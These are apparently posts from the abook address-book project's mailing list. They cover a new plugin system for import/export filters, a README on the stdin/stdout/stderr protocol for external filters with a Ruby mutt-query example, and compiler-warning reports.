scope. g++ does not use the common block, so if you choose to use it, understand that it is restricted to C only. Otherwise, use the-fno-commonoption. Using the common block means that you are going to write to a copy-on-write memory page. Avoid this practice for performance reasons. 2. Use static inline functions instead of preprocessor macros whenever possible. The compiler generates inline code at the call point for any function that is defined as staticinline. This action omits the linkage overhead and external reference generation. Inlined functions are just as fast as preprocessor macros and much easier to maintain, because you can represent complex logic without having to worry about preprocessor rules. gcc will not generate any inline code at -O0; you must optimize at level -O1 or higher. 1. Avoid altering constants. Not only will altering constants risk unnecessary copy-on-write activity, but certain optimization techniques merge constants. Altering an in-memory value that you think is constant and isolated might have adverse consequences. 2. It is possible to debug optimized code. There is no longer any reason to develop and test at no optimization (-O0). You can safely debug at all levels of optimization. Understand that certain optimizations might reorder instructions, remove variables from the debugger view, eliminate common expressions, eliminate useless instructions, or eliminate intermediate data objects; any of which can be confusing as you debug. Depending on your tolerance for these kinds of changes to your original code, you might wish to lower the optimization level during unit test. You are free to make the choice that suits you. 3. The compiler is better than you are at optimizing code. Do not try to optimize code by moving statements around, sequencing automatic storage, or engaging in similar techniques -- the compiler will do this anyway as long as you choose to optimize at levels 1 through 3. Instead, cooperate with the optimizer by inlining aggressively. 4. Consider using the maximum level of optimization (-O3) instead of lower levels. In gcc and g++, there are over 100 possible optimization techniques that you can select individually, or you can enable over 80 of the most useful of these by simply passing the level 3 optimization option (-O3) on the command line. Most significantly, the compilers attempt to generate inline functions that meet certain size tests without you having to do anything in code. 5. Avoid writing inline assembler. gcc and g++ both have the asm() construct, which permits you to write inline assembler instructions within its bounds. The drawback to using inline assembler is that it impedes optimization. Avoid using it except when absolutely necessary. 6. Use internal linkage instead of enter/back or external linkage whenever possible. A function call between members of the same shared object library occurs without interference from the operating system, which results in the shortest path length during a control transfer. External function calls (calls on external labels between members of different shared object libraries) call enter/back indirectly. Enter/back linkage involves system intervention whether it is used directly or indirectly. Use either enter/back or external linkage if you must; but consider your alternatives. 7. Pass values as function arguments instead of referring to file-scoped, static, or extern storage whenever possible. The goal is to keep as many data objects on the stack or in the heap as possible. As previously explained, using data objects outside of these storage areas risks unnecessary copy-on-write activity. 8. Avoid writing functions that have more than 5 arguments. The zSeries ELF Application Binary Interface Supplement document states that up to five integer arguments are passed from the calling function to the called function in general registers 2-6. If there are six or more arguments, additional arguments are saved in storage, which impedes high performance. 9. When writing assembly language subroutines for C/C++ programs, use PRLGC instead of TMSPC as the prolog macro. The TMSPC macro has a TPF 4.1 parameter passing interface, which means the macro allocates storage for and stores the register-resident arguments into a simulated Type-1 parameter list. This allows you to migrate existing assembler programs of this type more easily. However, this parameter-handling scheme always causes extra path length. The PRLGC macro respects the ELF ABI use of R2-R6, which avoids excess instructions. 1. Use C++ only when your needs require its features. Compilation in C++ generates larger code and has certain runtime overhead that makes C++ marginally more expensive than C in terms of performance. Code in C++ where appropriate; otherwise, code in C. 2. A struct and a class are the same things in C++. Even a struct has default constructors (instantiation and copy), a default assignment operator, and a default destructor. Like a class, a struct might have member functions or virtual functions (or both). Declaration of a const data member has initialization constraints that do not exist in C. 3. C++ support is at the 1998 ISO standard level. Treat namespaces as mandatory. The std:: namespace exists in all the standard C++ headers and must be referenced with a using statement if you plan to use its identifiers without redundant scope qualification. The objective is to keep the global namespace uncluttered. In the spirit of this goal, partition your user-defined classes and data objects into uniquely-identified namespaces, too. 4. Prefer the C language stdio.h family to the C++ stream classes derived from ios . These classes (fstream, istream, ostream, iostream, and relatives) multiply inherit in both lateral and vertical directions; they call all required constructors and destructors at the appropriate times. Their C language counterparts, such as the printf function, can usually perform the same job at a much lower cost. 5. Beware of temporary objects. The C++ compiler generates temporary objects when it needs to preserve intermediate results (or rvalues), most commonly in the resolution of an arithmetic-style expression that consists of more than one operation. Certain types of conversion operations and initializations also can cause the compiler to generate temporaries. This is not serious when the operation involves plain old data types (such as int, double,char, and similar); but can impact performance when user-defined data types are the operands. A temporary object impacts performance because the constructor and destructor of the object must be run during the evaluation of the expression. In addition, the compiler might generate code to run a copy constructor if the particular operation requires it. Just to make all this a little worse, the compiler can allocate temporary objects from the default source (usually the heap) used by the allocator method of the class, which is more overhead than you might notice as you write that innocent-looking expression. Sometimes there is no alternative to creating an rvalue. However, if you are designing a class with overloaded operators and conversion functions, you often can handle the operation and assignment at the same time, which can prevent the compiler from generating temporaries. 6. Hide inline class methods. g++ treats function members of a class (methods) as inline when their definition appears in the context of their enclosing class declaration and optimization levels permit inlining. C++ language rules require that the compiler generates external labels for such methods, even when they are unnecessary. The use of templates amplifies this behavior. Use the -fvisibility-inlines-hidden command line option to prevent the compiler from generating these externals. This reduces module size and saves useless relocations from happening when the module is loaded. 7. Improve your knowledge of C++ at every opportunity. C++ is not a simple programming language that is useful for every circumstance. It has many features that have subtle but iron-clad meanings. Troubles arise when programmers attempt to violate those meanings. There are many choices available to you to solve all kinds of problems; knowing which to choose can mean the difference between a poorly performing program and one that works efficiently. We strongly suggest that you read journals, books, and other publications designed to extend your understanding of the C++ programming language. Read the section on file scoped static, recommending pass by value. Have need for a 700 entry array of char * [3][ ] with {“100?,”litteral constant messages”,”2254?},… as an initializer. In a TPF 4.1 implementation, Two methods of a new class will reference the array, so my first thought was to define a file scope, static const. Given the array is ONLY read, do you see a performance hit or worse, code failure, for having a ‘large’ char * array as static? thoughts? Passing this array of arrays by value might not make sense — that’s a lot of space you’re talking about. You’d have to make a copy of all the data you’re going to pass (over 16 KB) which — all by itself — will occupy either 5 or 6 pages (depending on how deeply into its first page the [0][0]th element is) on the parm list. Or you could much more simply and cheaply just pass a pointer to the [0][0]th element and be done with it; in other words, I’d recommend you pass this particular argument by reference. Looking forward to z/TPF, you have to consider the addressing mode (AMODE) of the callee in this discussion. If you have an AMODE=31 callee, then it might be worthwhile to make a copy of this aggregate in below-the-2G-bar storage. As to where the ‘master copy’ of this array of arrays lives, have you considered TPF global storage? If these are truly read-only or updated very infrequently, they’d make a nice global, as well as making them addressible to all programs. But I’ll presume you’ve investigated this approach and rejected it for some valid reason. Limiting myself to a discussion of z/TPF (not TPF 4.1), we are left with three other places we could store this data, and we will always pass references to them via a pointer to element [0][0] when we pass it as a function argument: 1. In a control section of the program, either .data or .rodata, depending on how you’ve qualified your aggregate. This means you’d code the array of arrays and its initialzers in file scope. This would go into control section .data if it’s not qualified as read-only, or into control section .rodata if you’ve made it read-only with the ‘const’ qualifier. As long as you don’t write on this data, there is no performance loss whatsoever. If you write on any of those pages, you start incurring the expense of copy-on-write behavior, which will happen just once per affected page. 2. On the stack. Here we need to consider the overhead involved in making that stack-based copy from constants stored in the .rodata section of your program. You are just assuming the cost of copying 5 or 6 pages instead of the CP. 3. On the heap. This is probably the safest and useable approach by all programs; but it is also the most expensive. You would incur the overhead of making the copy just like #2, then we have to allocate and later free that memory, unless you’re close enough to EXITC where a memory leak of that size won’t hurt you. So, which would I choose if I wanted to keep resource consumption at an absolute minimum? I’d go for #1, presuming that I have a 100% read-only use for the data and I know that my callee and all of its downline users of those data share my addressing mode. If I have callees of unknown AMODEs, I think I’d go with #3. While we certainly want to avoid otherwise avoidable expenses, we have to remember that the most expensive program of all is the one that doesn’t work. If you would like to have a further, more in depth discussion on this, please feel free to contact your CSR Note: Additional information on this topic can be found at:
https://www.ibm.com/developerworks/community/blogs/zTPF/entry/ztpf-c-performance-hints?lang=en
CC-MAIN-2016-36
refinedweb
2,630
54.32
22 January 2010 06:14 [Source: ICIS news] SINGAPORE (ICIS news)--Recent shutdowns of purified terephthalic acid (PTA) lines in China-based Dahua Yisheng and Ningbo Formosa Chemical Fibre Corp (FCFC) may support PTA prices in the country, traders said on Friday. Dahua Yisheng’s 1.5m tonne/year plant in ?xml:namespace> The shutdown was expected to last five days and would cause an estimated production loss of around 20,000 tonnes of PTA, he added. Ningbo FCFC had shut down its 600,000 tonne/year unit on Thursday for a planned maintenance and expected to restart it in a week, the company source said. Production loss due to the shutdown was estimated at around 13,000-14,000/tonnes of PTA, the source added. The shutdowns could underpin market prices, traders said, even as a bearish sentiment at the Zhengzhou Commodity Exchange saw a drop in PTA futures. Spot prices for Taiwanese PTA cargoes remained firm at $965-970/tonne (€685-689/tonne) CFR (cost and freight) ($1 = €0.71
http://www.icis.com/Articles/2010/01/22/9327970/plant-shutdowns-may-underpin-china-pta-prices-traders.html
CC-MAIN-2015-18
refinedweb
172
69.01
On Saturday, May 28, 2011, Mateusz Harasymczuk <ma...@harasymczuk.pl> wrote:> Recently, I had to make more than one admin class in admin.py file.> I have never had a situation like this before.> I keept my admin classes in separate files in admin module.>> It came to me that after each class definition you have to make> admin.site.register(Class, AdminClass)>> Hence:>> - Where is the best place to put this call?> after a AdminClass definition?>> Try it, it looks ugly Says you. Given that admin registration has always been like this,that means I've been "trying it" for about 4 years, and I don't findit ugly at all. > - At the end of file with other registers?>> it is similar to signals connect and template_tag registering.>> Therefore it should be similarly decorated by decorator.>> @register_admin(class=ModelName)> class ModelAdmin:> pass>>> what do you think? I think this misses several important points. Firstly, class decorators are a relatively recent addition on Python.They were only added in Python 2.6. Django needs to support Python2.5. Secondly, a class decorator must be used at the same time as the classis declared. The statement-based registration based approach means youcan define a class in one module, and then register it in a differentmodule. Thirdly, statement-based registration you can also include businesslogic as part of the registration process; e.g., make a programmaticdecision as to which admin registration to use at runtime. This sortof conditional behavior isn't an option with class decorators. > BTW:> This one is even more ugly than previous one!>> How about changing:>> model_method.allow_tags = True> model_method.short_description = _( 'Model Method' )>> into:>> @options(allow_tags=True, short_description=_('Model Method'))>> or:>> @allow_tags> @short_desctiption(_('Model Method'))>> ? I'm more sympathetic to this idea. This seems like a case wheredecorators would be a good match - in fact, it could be a slightimprovement, because misspelling a function annotation won't raise anerror, but a misspelled decorator will. i.e., def myfunc(): ...myfunc.short_descriptionnnnn = "xxx" isn't an error, but @short_descriptionnn("xxx")def myfunc(): ... Is, because the decorator named short_descriptionnn doesn't exist. Yours,Russ Magee %-)
https://groups.google.com/forum/?_escaped_fragment_=topic/django-developers/Ebe-nGumjug
CC-MAIN-2017-39
refinedweb
356
52.15
print out the numbers that are NOTrepeated int other words if the user inputs uni[] = {1,2,4,2,5} the 2 will not be printed out because its repeated here is what I got so far: import java.util.*; public class Ejer4 { public static void main(String args[]){ Scanner reader = new Scanner(System.in); int[] uni = new int[5]; int [] apples = new int[5]; int var = 0; for(int i = 0; i<5; i++){ System.out.println("Input a number: "); uni[i] = reader.nextInt();} for(int y = 0; y<uni.length-1;y++){ if(uni[y] != uni[y+1]){ apples[y] = uni[y]; } } for(int j=0; j<apples.length;j++) System.out.println("The non-repeating numbers are: " + apples[j]); } } It works kind of well but it still prints out one of the repeated numbers which isnt good, and also it prints out 0 at the end and 0 in place of the repeated number its understandable given that the array has a fixed size.. so I hope I get some help.. thanks
http://www.dreamincode.net/forums/topic/246766-array-processing-detail-help/page__p__1434440
CC-MAIN-2016-22
refinedweb
175
71.04
Punit JainBAN USER @devesh Do you always follow syntax? There is a thing called logic. Btw you can modify the function internally. Push elements in stack in inorder. Then pop each element and assign its successor. Complexity O(n); Stack stack Inorder (node *root) { if (root == NULL) return; Inorder (root->left); stack.push (root); Inorder (root->right); } node *p1=NULL, *p2=NULL; while (!stack.empty) { p2 = stack.pop; p2->next = p1; p1 = p2; } The subarray should be "15 1 11 -15 18" not "15 1 11". Pseudo code sum = 0, max = 0, start, end a = 1, for i = 1 to N { sum = sum + arr[i]; if (sum > max) { max = sum; end = i; start = a; } if (sum < 0) { a = i+1; sum = 0; } } The maximum sum subarray would be from arr[start] to arr[end] Do BFS from start node and find the nodes which has distance K, print them. The other solution: Distance (Node *node, dist, k, Node *parent, Node *child) { if (node == NULL) return; if (dist == k) { print (node->data); return; } // Passing parent and child to avoid the same node to be visited again. if (node->left != child) Distance (node->left, dist+1, k, node, NULL); if (node->parent != parent) Distance (node->parent, dist+1, k, NULL, node); if (node->right != child) Distance (node->right, dist+1, k, node, NULL); } main () { Distance (Node *node, 0,k, NULL, NULL); } I was asked the same question. Write a recursive program to compute the number of paths from top left to bottom right. I couldn't write that time but later I tried at home and did it. Here is the pseudo code: int Number_of_Paths (node *head) { if (!head) return 0; if (head->right && head->down) return ( Number_of_Paths(head->right) + Number_of_Paths(head->down)); else if (head->right) return Number_of_Paths (head->right); else if (head->down) return Number_of_Paths (head->down); else return 1; } This looks like a good solution. nCr could be written as nCn-r. So (m+n-2)C (n-1) could also be written as (m+n-2)C(m-1). So it could be vice versa Approach would be right if string length is even. It wouldn't work for string which is of odd length. Do ps -AL | grep pid 1st column is parent id and the second column is thread (LWP) id. if both are same then its a process id otherwise thread. when dynamic allocated memory is not freed after its use. This result in the memory leak. To implement integer array of size array_size int *p = (int *) malloc (sizeof(int) * array_size); now you can assign values using p[i] = something // i =0 to array_size-1 and and access them using same; reverse the whole string then reverse by words. reverse (str); while (*str != '\0') { start = str; while (*str != ' ' && *str != '\0') { str++; } end = str-1; while (start < end) { char c; // to swap characters c = *start; *start = *end; *end = c; start++; end--; } if (*str != '\0') str++; } This one is classy problem : classic-puzzles.blogspot.in/2006/12/google-interview-puzzle-2-egg-problem.html pick any 6 balls divide them into 3 each. if they are same check the rest two and you will find the heavier. if they are not same then choose 3 from heavier bowl and pick any two and weigh them, if they are same third one is heavier otherwise its clear. so you have to weigh only two times. const char *p, char * const p first is constant character pointer, the value pointed by p is constant. second one is a constant pointer to character, where the value of p (address) is constant. Yes if it is not a waited graph. It can be done by slightly modifying BFS algorithm. for u , v E all edges connected to u. // just a reference from bfs algo if v is already marked gray and check if d (v) == d(u) + 1, increment number of shortest paths to v by 1 otherwise if v is white set number of shortest path to 1, d(v) = d(u) +1. You can also modify dijkstra's Algorithm but complexity would increase (in case of weighted graph). Use BFS to find strongly connected components in undirected graph return the largest one. O(|V| + |E|) Using expected value of first 100 outcomes. black 90 white 10. remains 810 black and 90 white. so probability would still be 9/10 there are two cases in which india win: 1) Akbar tells the truth and Amar tells the truth : 3/4*3/4 = 9/16 2) Akbar tells a lie that India loose and Amar tells lie to anthony that "Akbar told me india win" : 1/4*1/4 = 1/16 So total probability of winning India would be 9/16 + 1/16 = 10/16 Correct me if I am wrong. The code is correct and produces right output. What is the problem in using global variable ? or you are unfamiliar with them ? This means that each node will contain its data + sum of all node's data in right subtree. node->data = node->data + (sum of all nodes in right subtree). Reverse Inorder would do the work for us. Code: int sum = 0; //global variable sum_max (node *root) { if (root == NULL) return; sum_max (root->right); sum = sum + root->data; root->data = sum; sum_max (root->left); } Algo: for each character in string if its a left part i.e. (,{,[ Push in stack else if its a right part pop from stack and match whether is appropriate left part of parenthesis. any case doesn't match return FALSE. return TRUE. Negative numbers are stored as 2's compliment . Assuming 32 bit integer answer would be fffffff0. 1. get to middle element of string. 2. take two pointers p1 and p2 point to middle element(if string is of odd length, or two different middle elements incase of even length). 3. while (p1 >= start, p2 <= end) { if (*p1 !=*p2) return FALSE; p1--; p2++; } return true; Algo. 1. find the longest palindrome in string. 2. repeat the procedure for remaining two strings (left and right side of palindrome). Assume it has all distinct characters. total number of permutations : n! Algo: start from first character and traverse till end. find how many characters are ranked before this, suppose this is x, now we know there are x * (n-1)! permutations are ranked above this. Repeat the procedure for every character in string. int n = strlen(str); int rank = 0; for (i = 0; i < n-1; i++) { int x=0; for (j = i+1; j<n ; j++) { if (str[i] > str[j]) x++; } rank = rank+ x*((n-i-1)!) } return rank; Use randomize selection to find the 2nd largest element i.e. element at N-1 th position. solution 2. int max1, max2 = 0; for i = 1 to N if (A[i] > max2) max2 = A[i] if (max2 > max1) swap (max1, max2) return max2 Hashing would be best approach for O(n). n = length of array. Before inserting each element to hash table look for if found n-- otherwise insert to table. return n What about hashing ? Before insertion check whether it is present before Inserting if no insert it with value 1 and if yes then increment the value with 1. Is it to find the zeros in binary format? If yes then: count = 0 while (n>0) { count = count + !(n&1) n=n>>1 //Right shift by 1 } return count To find in decimal format the count = 0 while (n>0) { count = count + (n%10>0 ? 0 : 1) n = n/10; } return count Algorithm for problem j=1 for i = 1 to N if (A[i] > 0) A[j] = A[i] j++ for i = j to N a[i] = 0 This takes O(n) without using any buffer annadwilliams31, Applications Developer at National Instruments I am Anthony, Human Resources specialist with a decade of successful experience in hiring and employee management.I am a ... dianamowery95, Consultant at Delve Networks My Name is Diana Mowery. I am from St. Louis and received a Bachelor Degree and My Masters Degree from ... I am from london. I am 27 year old. I work in a balanced fortune as a personal care aide ... EviePaul, Member Technical Staff at Abs india pvt. ltd. I am a Studio camera operator from Florida USA.I love to relax n' chill. love when it's cloudy ... Sorry, it was right shift, I have changed this. Shalini can you please elaborate through code. Thanks!- Punit Jain June 30, 2013
https://careercup.com/user?id=13095672
CC-MAIN-2021-31
refinedweb
1,416
74.69
QML TreeView using only QtQuick 2 works fine? - Diracsbracket last edited by Diracsbracket Hi. Quite a few people, including myself, have been regretting and wondering why TreeViewis only available in Controls 1which are deprecated since Qt 5.12. As it turns out however, it seems quite straight-forward to adapt the TreeViewcode to depend exclusively on Controls 2 elements. For instance, I just copied and merged all the QML code for a TreeViewinto a single .qmlfile that only depends on the following imports: import QtQuick 2.15 import QtQuick.Controls 2.15 import QtQml.Models 2.15 A working TreeViewthen only requires a local copy of the original TableViewColumn.qmlfile (which itself only depends on the QtQuick 2.15module), and a local copy of the QQuickTreeModelAdaptorclass source (which simply implements a QAbstractListModel) Internally, the original TreeViewuses ScrollView, ListViewand FocusScope, all of which have their equivalents in QtQuick2(the only property I needed to comment out was the frameVisibleproperty, which does not exist in ScrollView 2, and get rid of the viewportproperty). Aside from the styling parts which I either eliminated or hard-coded, and the scrollbar code which I currently disabled, it seems to work just fine: the tree displays, expands/collapses and behaves as expected, so far. I wanted to upload the code for that self-contained TreeView.qmlfile here, but unfortunately, posts are not allowed to be that long. That sounds great. Can you share it via Github? - Diracsbracket last edited by Diracsbracket @mnesarco said in QML TreeView using only QtQuick 2 just works fine?: Can you share it via Github? I uploaded the filesystembrowserexample using the modified TreeViewhere: A questions: Is it possible to make a copy of QQuickTreeModelAdaptor in a LGPL licensed program or would this violate the LGPL? - jsulm Lifetime Qt Champion last edited by @maxwell31 What exactly do you mean? Do you want to modify QQuickTreeModelAdaptor? Or why else you would need to "copy"? If you want to modify QQuickTreeModelAdaptor then you have ot make your changes open source (LGPL requirement).
https://forum.qt.io/topic/122814/qml-treeview-using-only-qtquick-2-works-fine
CC-MAIN-2022-21
refinedweb
337
57.27
, Martin Lorenz wrote: > is there any possibility to tell abook which fields it should return > for --mutt-query or - even better - is there a hidden query feature > somewhere, that returns arbitrary fields? Well, as a practical example of what you can do with external filters... now there is. Files attached. :) > i'd like to use abook to make a quick phon number lookup from the > commandline You can just use abook --convert --infile ~/.abook/addressbook --outformat custom_query \ --outoption query=3DMartin and abook will make a phone number lookup by default. Or you can control more precisely what you want your search to be based on, and what it should return - and even give several query strings: abook --convert --infile ~/.abook/addressbook --outformat custom_query \ --outoption search_fields=3Dname,email \ --outoption return_fields=3Dname,phone,workphone,city \ --outoption query=3Dmartin \ --outoption query=3Dcedric --=20 C=E9dric Hi, Below is a copy of doc/README.external_filters, describing the protocol for communications beetween abook and external filters. Please have a look. Comments most welcome, especially on the set of commands. It is the time to check if some things are lacking or need to be revised, etc. in order to have a convenient to use protocol. :) What is this documentook is written in the C programming language. Although this is fine for the application itself, it might not always seem the most obvious choice when it comes to write a filter for a new format. Writing a filter involves processing data/text, and at that task, many languages are more convenient than C. For this reason, abook provides a protocol for external programs to communicate with itself, thus allowing to easily write import/export filters without the need to tread with C sources. This document explains how to write a new filter in the programming language of your choice, be it in Perl, Python, Ruby, or even shell scripts. How does it work? =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Abook launches the external program/script, and establishes three channels of communication with it: * A command channel, which the filter will use to issue instructions to abook (like "give me the value of field X for current item", "commit this item to database", etc.). * A data channel, by which the filter receives requested data or error codes from abook. =20 * And in the case of an export filter, an output channel, into which the filter writes the resulting content. These channels are respectively the standard error, the standard input, and the standard output of the external filter. That is, a typical export filter will do something along the lines of: 1/ Issuing a command to abook, by writing it to stderr. For instance "field email" for requesting the value of the 'email' field of current item. 2/ Read the answer to this query on stdin. 3/ Write to stdout the data gathered from the database, in the exporting format. Import filters operate in a similar way. Commands =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D The set of available commands depends on what your filter does. Some commands are available only to import filters, some only to export filters, and some to both. We will describe each of them below. Commands available in import mode only -------------------------------------- * next_line - Description: requests the next line from the input file to process. - Answer: the requested line. - Errors: none. * field <name> =3D <value> - Description: sets field <name> of current item to <value> - Answer: none. - Errors: - OK - malformed request - undeclared field - OK (new field successfully declared) - Note: the automatic declaration of a new field depends on the value of the 'preserve fields' abook configuration option; unknown fields will be accepted only if this option is set to "all". * commit_item - Description: puts the current item into database, and then creates a new empty item to work with. - Answer: none. - Errors: - OK - no 'name' field. - Note: an item is required to have a 'name' field to be accepted in database. Commands available in export mode only -------------------------------------- * next_item - Description: advances to the next item in database, and closes the communication channels when there is no more items left. - Answer: value of 'name' field, or empty line to indicate end of items. - Errors: none. - Note: when the filter starts, the current item already points to the first, so there is no need to invoke 'next_item'. * field <name> [ , <name> ... ] - Description: requests the value of <name> field. - Answer: the corresponding value. - Errors: none. - Note: if several field names are given, the first non-void value found is returned. * field_name <name> - Description: requests the public name (intended for humans rather than software) of field <name>. - Answer: the requested name, or empty string if unknown. - Errors: none. * enumerate [ <options> ] - Description: iterates over the fields of current item. - Answer: one line for the field name, one line for its value. - Errors: none. - Notes: - this command must be called repeatedly, until meeting an empty line indicating end of fields; it does not return every fields in one run. - <options> is an optional comma separated list of options altering the behavior of this command: - all: don't only return fields having a value, return every known field. - equal: instead of returning two lines, one for the field name, and one for the value, return a single line using the format "<name>=3D<value>". - Description: requests all emails addresses of current item. - Answer: one line for each address, an empty line to indicate the end. - Errors: none. Commands available in both modes -------------------------------- * errors [ filter | stderr | none ] - Description: set the errors reporting mode (default is 'stderr'). - filter: when an error code (actual error or OK) is to be returned for a command, send it to the filter (thus a read is necessary). - stderr: when an error occurs (an actual error, not an OK code), print it to abook's standard error. - none: no error is reported in any way. - Answer: none. - Errors: (depending on the mode just being set) - OK - invalid value * stop [ <message> ] - Description: ends the processing, cutting the communication channels with abook; can display an optional message on stderr. - Answer: none. - Errors: none. =20 * puts <message> - Description: displays <message> to abook's stderr. - Answer: none. - Errors: none. - Note: as the standard error of the external filter is used to issue commands to abook, this command is the only way to give feedback on the user's terminal. * options - Description: queries the options provided to the filter. - Answer: one line for each specified option, an empty line to indicate the end of list. - Errors: none. - Note: these are options specific to the filter, not the options from abook's configuration file (abookrc). For the latter, use the abook_option command below. * abook_option <option_name> - Description: queries the value of the given abook configuration option. - Answer: the requested value. - Errors: invalid option. Pitfalls =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D When you issue commands that return values or error codes, be sure to completely read abook's answers before issuing another such command. You cannot, for instance, ask for a list of email addresses, just read the first one, and then request the value of the 'name' field, expecting this latter at next read. Reads must be complete, and in the order of issued commands. Passing options to the external Options can be passed in two ways: =20 1/ From the command line, with --inoption <value> and/or --outoption <value>. 2/ Via the description file, using "import_option <value>" and "export_option <value>" In each case, it is possible to pass an arbitrary number of such options. From the filter, they can be fetched using the 'options' command. Description file =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Abook needs a way to know about available external filters. It will <name> is the name of the format the filter handles. Abook looks for this file in the following places: - the user abook's directory ($HOME/.abook) and its subdirectories. - the system filters directory ($prefix/lib/abook) and its subdirectories. This file consists of lines made of a keyword, followed by a whitespace and an associated value. Possible keywords are: - import_path: the path of the program/script to call when using this filter for importing. - export_path: ditto, for exporting. - description: a description of the format handled by this filter; this field is mandatory for the filter to appear in the list given by the --format command line option or in the import/export screens within abook. - import_option: an option to pass to the import filter. several such lines can be provided. - export_option: ditto, for the export filter. There can be one or both of 'import_path' and 'export_path', depending on what your filter implements. The paths can be given absolute, or relative to the base search directory. Example =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Goal ---- Abook integrates quite well with mutt, thanks to its --mutt-query command line option. Unfortunately, the fields it uses for searching are not configurable. Let's remediate this by re-implementing a --mutt-query feature featuring arbitrary research fields, using the Ruby language, for an example of export filter. The files --------- We will need the following files: - a description file, called 'mutt_query_filter.external' - an export script (executable bit set), called 'mutt_query.rb' =20 We will put those two files in a directory $HOME/.abook/mutt_query/. Their content follows... mutt_query_filter.external -------------------------- export_path mutt_query/mutt_query.rb description mutt query with arbitrary research fields mutt_query.rb ------------- #!/usr/bin/ruby def cmd(c); $stderr.puts c; end def cmd_res(c); cmd(c); $stdin.gets.chomp!; end def cmd_list(c) cmd(c) $stdin.each_line {|l| break if l.chomp! =3D=3D "" yield l } end fields =3D Array.new queries =3D Array.new cmd_list("options") {|o| o.scan(/^(\w+)=3D(.*)$/) {|opt, val| case opt when "fields" then fields +=3D val.split(",") when "query" then queries << val end } } cmd("stop No query.") if queries.empty? fields =3D [ "name", "email", "nick" ] if fields.empty? found =3D 0 while true do match =3D false fields.each {|f| next if (val =3D cmd_res("field #{f}")) =3D=3D "" queries.each {|q| match =3D true if val =3D~ /#{q}/i } } if match name =3D cmd_res("field name") notes =3D cmd_res("field notes") puts "" if (found +=3D 1) =3D=3D 1 cmd_list("emails") {|e| puts "#{e}\t#{name}\t#{notes}\n" } end break if cmd_res("next_item") =3D=3D "" end puts "Not found" if found =3D=3D 0 Usage ----- You just have to put this (one single line) into your muttrc: set query_command=3D"abook --convert --infile ~/.abook/addressbook --outformat mutt_query --outoption fields=3Dname,email --outoption query=3D%s" The fields use for searching can be customized via the "--outoption fields=3D" option. Now, press the 'Q' key within mutt, enter you query, and voil=E0! --=20 Cedric Jaakko Heinonen wrote: > Compiles and seems to workk OK on Solaris 9 with these compile warnings= : > "ltdl.c", line 3716: warning: argument #4 is incompatible with prototyp= e: > [...] > "filter.c", line 153: warning: assignment type mismatch: > [...] Fixed. > I am still not a big fan of separate modules. IMO it adds unneeded > complexity. I don't think it adds much complexity code-wise. Now we have an interface for accessing the database, and I think it is a good thing, regardless of whether we use modules or a monolithic abook. My main concern about it was portability. I would have liked to just use plain dlopen(), but it doesn't seem the best option for multiplatform, so I went the libltdl path, which should ensure dynamic loading works reasonably well everywhere. But yes, as I noticed later, it does add some weight to the tarball... > However it may prove to be useful in the future if people create "3rd > party" modules. I certainly hope so. :) > Btw. Is there a reason to link all modules against (n)curses and > readline? No good reason, other than the fact that configure.in uses some readline and curses detection macros that set general compilation variables like LIBS, and hence affects every subdirectories. This could surely be avoided by some acinclude.m4/configure.in/Makefile.am tweaking... --=20 C=E9dric Short summary - Improved filters code. - Handling of external filters. I have made some use of variadic macros. This is in the C99 standard, I hope there is no compilers out there for which it is too "recent" (sic). Anyway... any tests, LaTeX phonebook filters, etc. welcome. ;) --=20 C=E9dric On 2005-10-31, Cedric Duval wrote: > - interface beetween filters and abook in filters/filter_interface.h > - helpers to easily write new modules. These look very good. > - Each filter is a module dynamically loaded when needed. I am still not a big fan of separate modules. IMO it adds unneeded complexity. However it may prove to be useful in the future if people create "3rd party" modules. Btw. Is there a reason to link all modules against (n)curses and readline? > - Native abook format is handled through a filter module like any other > format. Good. -- Jaakko > Compiles and seems to workk OK on Solaris 9 with these compile warnings: "ltdl.c", line 3716: warning: argument #4 is incompatible with prototype: prototype: pointer to void : "ltdl.c", line 2633 argument : pointer to function(pointer to const char, pointer to void) ret= urning int "ltdl.c", line 3722: warning: argument #4 is incompatible with prototype: prototype: pointer to void : "ltdl.c", line 2633 argument : pointer to function(pointer to const char, pointer to void) ret= urning int "ltdl.c", line 3726: warning: argument #4 is incompatible with prototype: prototype: pointer to void : "ltdl.c", line 2633 argument : pointer to function(pointer to const char, pointer to void) ret= urning int "ltdl.c", line 3733: warning: argument #4 is incompatible with prototype: prototype: pointer to void : "ltdl.c", line 2633 argument : pointer to function(pointer to const char, pointer to void) ret= urning int "ltdl.c", line 3740: warning: argument #4 is incompatible with prototype: prototype: pointer to void : "ltdl.c", line 2633 argument : pointer to function(pointer to const char, pointer to void) ret= urning int "filter.c", line 153: warning: assignment type mismatch: pointer to function(pointer to struct abook_ops {pointer to function(..) r= eturning pointer to char real_db_field_get, pointer to function(..) returni= ng pointer to char real_get_first_email, pointer to function(..) returning = int real_db_field_put, pointer to function(..) returning int real_add_item2= database, pointer to function(..) returning pointer to pointer to char item= _do, pointer to function(..) returning int real_item_fput, pointer to funct= ion(..) returning pointer to char real_item_fget, pointer to function(..) r= eturning int real_db_enumerate_items, pointer to function(..) returning int= real_enumerate_fields, pointer to function(..) returning int real_field_id= , pointer to function(..) returning union ret_value {..} field_query, point= er to function(..) returning int real_declare_unknown_field, pointer to fun= ction(..) returning union opt_value {..} opt_get_value}, pointer to struct = abook_list_t {pointer to char data, pointer to struct abook_list_t {..} nex= t}) returning pointer to struct filter_ops {pointer to function(pointer to = struct __FILE {..}, struct db_enumerator {..}) returning int export, pointe= r to function(pointer to struct __FILE {..}) returning int import, pointer = to function() returning pointer to char description} "=3D" pointer to void "ui.c", line 229: warning: argument #2 is incompatible with prototype: prototype: pointer to char : "/usr/include/curses.h", line 1104 argument : pointer to const char ui.c warning is not related to new module code. --=20 Jaakko Dear Folks, On Wed, Nov 02, 2005 at 11:04:51AM +0100, Cedric Duval wrote: >. >=20 >. >=20 > These channels are respectively stderr, stdin and stdout of the > external filter. Now I need to define a convenient protocol... >=20 > This feature should lower the entry level required to write new > filters, as anyone will be able to use his favourite language, > presumably one more adapted to text processing than C is. A really good idea. I also use abook to generate LaTeX phone lists. I generate them by directly parsing the abook database. However, if the backend changes, then my Perl program would need to change. If there is a standard interface to 